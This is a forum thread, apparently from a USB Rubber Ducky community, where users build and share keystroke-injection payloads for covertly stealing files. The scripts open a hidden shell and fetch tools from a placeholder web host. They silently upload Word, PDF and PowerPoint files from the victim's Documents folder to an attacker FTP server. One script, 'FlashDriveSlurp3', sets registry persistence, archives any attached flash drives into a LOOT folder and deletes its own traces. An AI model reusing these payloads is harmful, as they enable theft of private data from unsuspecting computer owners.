Jump to content

Search external drive and and copy files in subfolders.


ebmar

Recommended Posts

Hi.

Just bought the rubber ducky and I love this little gadget!

I figured out how to copy files from just my documents (see codes below), but I have problem going through subfolders.

I want to do this basically:

Get a batch job to search My documents and all subfolders for file extension .docx, .doc etc. and upload them with WinSCP.

Also I want it to search for removable usb drive and search for .docx in root and all subfolders. I searched a lot and all examples says that you have to know the drive name (not letter).

I have no idea how to go from here.

This is my script for hidden copy so far:

Rubber ducky.txt:

DELAY 200
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 200
STRING cd %USERPROFILE%
ENTER
STRING ftp -i IP_ADDRESS
ENTER
DELAY 200
STRING USERNAME
ENTER
STRING PASSWORD
ENTER
STRING GET invisible.bat
ENTER
DELAY 200
STRING GET invisible.vbs
ENTER
DELAY 200
STRING BYE
ENTER
DELAY 200
STRING wscript.exe invisible.vbs invisible.bat
ENTER
DELAY 200
STRING exit
ENTER

It takes rubber ducky about 6 sec from when you put it in to the computer until you unplug it to download the files and run them hidden.

invisible.vbs

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

This to run the .bat as hidden.

invisible.bat

bitsadmin /Transfer JobName http://WEBSITE/WinSCP.exe "%userprofile%\WinSCP.exe"
bitsadmin /Transfer JobName http://WEBSITE/WinSCP.com "%userprofile%\WinSCP.com"
cd %USERPROFILE%\documents
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USERNAME:PASSWORD@FTP_SERVER" "put *.doc" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USERNAME:PASSWORD@FTP_SERVER" "put *.docx" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USERNAME:PASSWORD@FTP_SERVER" "put *.pdf" "close" "exit"

This script runs in the background.

bitsadmin to download WinSCP, and WinSCP to upload files to a ftp server.

If you find the above scripts useful feel free to redistribute it as you wish.

And thanks in advance.

Link to comment
Share on other sites

I have almost no experience scripting, and I'm pretty much a retard when it comes to scripting, but I found out how to upload a whole folder with WinSCP.

This is my new invisible.bat

bitsadmin /Transfer JobName http://WEBSITE/WinSCP.exe "%userprofile%\WinSCP.exe"
bitsadmin /Transfer JobName http://WEBSITE/WinSCP.com "%userprofile%\WinSCP.com"
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USERNAME:PASSWORD@FTP_SERVER" "put *documents" "close" "exit"

I removed changing directory to documents, and changed WinSCP to just copy the whole documents directory. The problem with this is if the directory got a whole lot of large videos it would take a lot of time, meaning the computer must stay online over a long period of time.

Does anybody know how to copy only certain files in a folder and all subfolders?

Link to comment
Share on other sites

You should look for some articles in stack overflow or something for recursing directories. Typically done with a for loop I think. Another thing you could do is archive the folder in question which will typically include all sub directories, save the archive someplace else on the system, and upload the archive to the destination server. This should install 7zip on a computer, but will not install if users are not admins:

GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/project/sevenzip/7-Zip/9.20/7z920.exe?r=http%3A%2F%2Fwww.7-zip.org%2F&ts=1384902016&use_mirror=softlayer-dal','%TEMP%\7z920.exe'); Start-Process "%TEMP%\7z920.exe /S /D=%PROGRAMFILES%\7-Zip\"
ENTER

I think this is a working script, it is for gathering flashdrives that are plugged into a system. If not, then there are two other files in it's directory, so may have to test later which one actually works.

REM Author: overwraith
REM Name: FlashDriveSlurp3.txt
REM Purpose: Copies flash drives to the hard drive for later exfiltration. 
REM Encoder V2.4+

REM *** Initial Delay *** 
DELAY 2000

REM *** Bypass UAC ***
REM Using the run command for a broader OS base. 
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
ENTER

REM *** Navigate to %TEMP%. ***
STRING cd %TEMP%
ENTER

REM *** Delete 7zip files if they already exist. ***
STRING erase /Q 7za.exe 7z920.zip 7-zip.chm license.txt readme.txt
ENTER

REM *** Install 7zip. ***
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7za920.zip','%TEMP%\7za920.zip'); $shell = new-object -com shell.application; $zip = $shell.NameSpace('%TEMP%\7za920.zip'); foreach($item in $zip.items()) { $shell.Namespace('%TEMP%').copyhere($item) }Start-Process '%TEMP%\7za.exe' -ArgumentList '/S /D=%PROGRAMFILES%\7-Zip\'
DELAY 500
ENTER
REM *** Delay 7 Seconds. ***
DELAY 7000
REM *** Switch from powershell back to command line. ***
STRING CMD
ENTER

REM *** Delete batch file if it already exists. ***
STRING erase /Q FlashDriveSlurp.bat
ENTER

REM *** Make batch file that copies flash drive data. ***
STRING copy con FlashDriveSlurp.bat
ENTER
STRING @ECHO OFF
ENTER
STRING setlocal EnableDelayedExpansion
ENTER
REM *** Registry key that restarts script on reboot. ***
STRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\FlashDriveSlurp.bat" /f
ENTER
REM *** Make the destination we are 7zipping to. ***
STRING set destination=%TEMP%\LOOT\%COMPUTERNAME%
ENTER
STRING if NOT EXIST %destination% mkdir %destination%
ENTER
STRING :while1
ENTER
REM *** Determine if "DUCKY" drive is plugged in, if so exfiltrate the data. ***
STRING for /f %%A in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set DUCKYdrive=%%A
ENTER
STRING if [%DUCKYdrive%] NEQ [] (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
REM *** Get the attached flash drives letters and drive name's. ***
STRING set letters= 
ENTER
STRING set drivename= 
ENTER
STRING for /F "tokens=1,3 delims= " %%A in ('wmic volume get driveletter^, drivetype^, label^, SystemVolume ^| findstr /V "System Reserved" ^| findstr/V "DUCKY" ^| findstr "2" ^| findstr "FALSE"') do ( 
STRING if [%%A] NEQ [] ( 
ENTER
STRING if [%%B] NEQ [] (
ENTER
STRING set letters=!letters! %%A 
ENTER
STRING set drivename=!drivename! %%B
ENTER
STRING )))
ENTER
REM *** 7zip the found flash drives. ***
STRING set i=0
ENTER
STRING for %%a in (%letters%) do set /A i+=1 & set letters[!i!]=%%a
ENTER
STRING set i=0
ENTER
STRING for %%a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%%a
ENTER
REM Set number to length of the array. 
STRING set n=%i%
ENTER
STRING for /L %%i in (1,1,%n%) do 7z u -t7z %destination%\!drivename[%%i]!.7z !letters[%%i]!\*
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1 
ENTER
STRING :break
ENTER
REM *** Copy to the ducky drive. ***
STRING xcopy %destination%\* %DUCKYdrive%\LOOT\%COMPUTERNAME% /I
ENTER
REM *** Terminate execution, clean up after script. ***
STRING erase /Q *.7z
ENTER
STRING rmdir /S /Q %TEMP%\LOOT
ENTER
STRING erase invis.vbs
ENTER
STRING erase /Q %0
ENTER
CONTROL z
ENTER

REM *** Delete Invisible vbs file if already exists. ***
STRING erase /Q invis.vbs
ENTER

REM *** Make VBS file to run invisibly. ***
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM *** Run the batch file invisibly. ***
STRING wscript.exe invis.vbs FlashDriveSlurp.bat
ENTER

REM *** Exit ***
STRING EXIT
ENTER
STRING EXIT
ENTER

One of the hardest things about batch is knowing to enable delayed expansion, which means that if you have a variable referenced twice in a for loop, batch needs to take that into account.

C:\Users\UserName>for /?
Runs a specified command for each file in a set of files.

FOR %variable IN (set) DO command [command-parameters]

  %variable  Specifies a single letter replaceable parameter.
  (set)      Specifies a set of one or more files.  Wildcards may be used.
  command    Specifies the command to carry out for each file.
  command-parameters
             Specifies parameters or switches for the specified command.

To use the FOR command in a batch program, specify %%variable instead
of %variable.  Variable names are case sensitive, so %i is different
from %I.

If Command Extensions are enabled, the following additional
forms of the FOR command are supported:

FOR /D %variable IN (set) DO command [command-parameters]

    If set contains wildcards, then specifies to match against directory
    names instead of file names.

FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters]

    Walks the directory tree rooted at [drive:]path, executing the FOR
    statement in each directory of the tree.  If no directory
    specification is specified after /R then the current directory is
    assumed.  If set is just a single period (.) character then it
    will just enumerate the directory tree.

FOR /L %variable IN (start,step,end) DO command [command-parameters]

    The set is a sequence of numbers from start to end, by step amount.
    So (1,1,5) would generate the sequence 1 2 3 4 5 and (5,-1,1) would
    generate the sequence (5 4 3 2 1)

FOR /F ["options"] %variable IN (file-set) DO command [command-parameters]
FOR /F ["options"] %variable IN ("string") DO command [command-parameters]
FOR /F ["options"] %variable IN ('command') DO command [command-parameters]

    or, if usebackq option present:

FOR /F ["options"] %variable IN (file-set) DO command [command-parameters]
FOR /F ["options"] %variable IN ('string') DO command [command-parameters]
FOR /F ["options"] %variable IN (`command`) DO command [command-parameters]

    file-set is one or more file names.  Each file is opened, read
    and processed before going on to the next file in file-set.
    Processing consists of reading in the file, breaking it up into
    individual lines of text and then parsing each line into zero or
    more tokens.  The body of the for loop is then called with the
    variable value(s) set to the found token string(s).  By default, /F
    passes the first blank separated token from each line of each file.
    Blank lines are skipped.  You can override the default parsing
    behavior by specifying the optional "options" parameter.  This
    is a quoted string which contains one or more keywords to specify
    different parsing options.  The keywords are:

        eol=c           - specifies an end of line comment character
                          (just one)
        skip=n          - specifies the number of lines to skip at the
                          beginning of the file.
        delims=xxx      - specifies a delimiter set.  This replaces the
                          default delimiter set of space and tab.
        tokens=x,y,m-n  - specifies which tokens from each line are to
                          be passed to the for body for each iteration.
                          This will cause additional variable names to
                          be allocated.  The m-n form is a range,
                          specifying the mth through the nth tokens.  If
                          the last character in the tokens= string is an
                          asterisk, then an additional variable is
                          allocated and receives the remaining text on
                          the line after the last token parsed.
        usebackq        - specifies that the new semantics are in force,
                          where a back quoted string is executed as a
                          command and a single quoted string is a
                          literal string command and allows the use of
                          double quotes to quote file names in
                          file-set.

    Some examples might help:

FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k

    would parse each line in myfile.txt, ignoring lines that begin with
    a semicolon, passing the 2nd and 3rd token from each line to the for
    body, with tokens delimited by commas and/or spaces.  Notice the for
    body statements reference %i to get the 2nd token, %j to get the
    3rd token, and %k to get all remaining tokens after the 3rd.  For
    file names that contain spaces, you need to quote the filenames with
    double quotes.  In order to use double quotes in this manner, you also
    need to use the usebackq option, otherwise the double quotes will be
    interpreted as defining a literal string to parse.

    %i is explicitly declared in the for statement and the %j and %k
    are implicitly declared via the tokens= option.  You can specify up
    to 26 tokens via the tokens= line, provided it does not cause an
    attempt to declare a variable higher than the letter 'z' or 'Z'.
    Remember, FOR variables are single-letter, case sensitive, global,
    and you can't have more than 52 total active at any one time.

    You can also use the FOR /F parsing logic on an immediate string, by
    making the file-set between the parenthesis a quoted string,
    using single quote characters.  It will be treated as a single line
    of input from a file and parsed.

    Finally, you can use the FOR /F command to parse the output of a
    command.  You do this by making the file-set between the
    parenthesis a back quoted string.  It will be treated as a command
    line, which is passed to a child CMD.EXE and the output is captured
    into memory and parsed as if it was a file.  So the following
    example:

      FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

    would enumerate the environment variable names in the current
    environment.

In addition, substitution of FOR variable references has been enhanced.
You can now use the following optional syntax:

    %~I         - expands %I removing any surrounding quotes (")
    %~fI        - expands %I to a fully qualified path name
    %~dI        - expands %I to a drive letter only
    %~pI        - expands %I to a path only
    %~nI        - expands %I to a file name only
    %~xI        - expands %I to a file extension only
    %~sI        - expanded path contains short names only
    %~aI        - expands %I to file attributes of file
    %~tI        - expands %I to date/time of file
    %~zI        - expands %I to size of file
    %~$PATH:I   - searches the directories listed in the PATH
                   environment variable and expands %I to the
                   fully qualified name of the first one found.
                   If the environment variable name is not
                   defined or the file is not found by the
                   search, then this modifier expands to the
                   empty string

The modifiers can be combined to get compound results:

    %~dpI       - expands %I to a drive letter and path only
    %~nxI       - expands %I to a file name and extension only
    %~fsI       - expands %I to a full path name with short names only
    %~dp$PATH:I - searches the directories listed in the PATH
                   environment variable for %I and expands to the
                   drive letter and path of the first one found.
    %~ftzaI     - expands %I to a DIR like output line

In the above examples %I and PATH can be replaced by other valid
values.  The %~ syntax is terminated by a valid FOR variable name.
Picking upper case variable names like %I makes it more readable and
avoids confusion with the modifiers, which are not case sensitive.

C:\Users\UserName>
Edited by overwraith
Link to comment
Share on other sites

I tried to make sense and modify the script so I can use it, but I'm not that good in scripting.

When I run the command: wmic volume where "drivetype=2" get driveletter /format:table | findstr : I get the list of removable usb disc, but I don't know how to cd in to that drive using the information wmic gave me.

It's usually only one removable device attached.

On the other hand!

I got the script working to copy all subfolders in Documents, but I found it easier and faster to make it only copy certain filetypes (if it would contain large movies etc.).

wscript.exe invisible.vbs wget.bat
REM Download WinSCP
bitsadmin /Transfer JobName http://WEBSITE/WinSCP.exe "%userprofile%\WinSCP.exe"
bitsadmin /Transfer JobName http://WEBSITE/WinSCP.com "%userprofile%\WinSCP.com"
REM Upload documents in Documents
cd %USERPROFILE%\documents
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put *.doc" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put *.docx" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put *.pdf" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put *.ppt" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch abort" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put *.pptx" "close" "exit"
REM Upload documents in subdirs
cd %USERPROFILE%

"%USERPROFILE%\WinSCP.com" /command "option batch continue" "option include *.doc" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put documents" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch continue" "option include *.docx" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put documents" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch continue" "option include *.pdf" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put documents" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch continue" "option include *.ppt" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put documents" "close" "exit"
"%USERPROFILE%\WinSCP.com" /command "option batch continue" "option include *.pptx" "option confirm off" "open ftp://USER:PASSWORD@FTP_SERVER" "put documents" "close" "exit"

The other files are the same as of now.

Link to comment
Share on other sites

So for getting attached drives you use a command like this:

for /F "tokens=1,3 delims= " %%A in ('wmic volume get driveletter^, drivetype^, label^, SystemVolume ^| findstr /V "System Reserved" ^| findstr/V "DUCKY" ^| findstr "2" ^| findstr "FALSE"') do ( 

So in order to change directories to that drive you don't use CD in the prompt because cd doesn't change drives, it wont do anything. You need to type something along the lines of:

D:

So inside a loop it would be something like this:

%%i:

where "i" is your iterator.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...